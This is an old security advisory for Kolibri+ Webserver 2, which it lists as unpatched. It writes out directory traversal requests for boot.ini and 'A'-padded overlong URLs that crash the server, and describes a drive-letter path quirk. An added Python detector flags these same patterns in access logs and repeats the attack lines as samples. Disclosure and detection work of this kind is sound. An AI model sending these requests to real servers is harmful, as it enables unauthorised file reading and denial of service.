/*
Kolibri+ Webserver 2 Multiple Vulnerabilities

[*] Date : 06/09/09

Kolibri+ Webserver 2 is affected by multiple vulnerabilities, namely:

> Directory Traversal
> Denial Of Service / Crash
> Strange Behavior

[*] Download Page : http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Exploitation :

[+] Directory Traversal

GET /../../../../../../../../../boot.ini HTTP/1.0

GET /../../../../../../../../boot.ini HTTP/1.0




[+] DoS / Crash

("A" x 200; #Late crash)
http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

("A" x 250 or more than 250 bytes; #Immediate termination of process)
This can also be used: /default.asp["A" x 250]


[+] Strange Behavior
"/x/_/c:/boot.ini"
Giving this in the URL displays a "Not Found" message in the browser and fires off a message box on the local GUI saying that it cannot find the file specified. By contrast, the typical 404 Not Found message for GET /s HTTP/1.1 is "Not found: /s", and nothing fires off a message box on the local GUI.
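
A detection-side check for the three request patterns listed above, added here as an example and not part of the original advisory. The function name `classify`, the 200-byte cut-off used as a rule threshold, and the sample request lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# The advisory reports a late crash at ~200 filler bytes and immediate
# termination at 250 or more; 200 on the whole path is an assumed cut-off.
MAX_PATH_LEN = 200
DRIVE_SEGMENT = re.compile(r"(^|/)[A-Za-z]:(/|$)")

def classify(request_line):
    """Return the set of advisory patterns a raw HTTP request line matches."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return {"malformed"}
    path = parts[1].split("?", 1)[0]
    # Decode a few rounds so %2e%2e%2f and double encoding surface as ../
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    findings = set()
    # Walk the segments: a ".." that climbs above the web root is traversal,
    # while a harmless "/a/../b" is not flagged.
    depth = 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                findings.add("traversal")
                break
        else:
            depth += 1
    if len(path) >= MAX_PATH_LEN:
        findings.add("overlong-path")
    if DRIVE_SEGMENT.search(path):
        findings.add("drive-letter-segment")
    return findings

# Constructed sample request lines (not captured traffic).
SAMPLES = [
    "GET /index.html HTTP/1.1",
    "GET /../../../../../../../../../boot.ini HTTP/1.0",
    "GET /default.asp" + "A" * 250 + " HTTP/1.0",
    "GET /x/_/c:/boot.ini HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(sorted(classify(line)), line[:60])
```

Run it over the request-line field of the web server's access log or a proxy log; any non-empty result is worth a look, and the same three checks translate directly into a reverse-proxy deny rule placed in front of the unpatched server.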


Author : Usman Saeed , Xc0re Security Research Group.

Copyright (c) Xc0re 2007-2009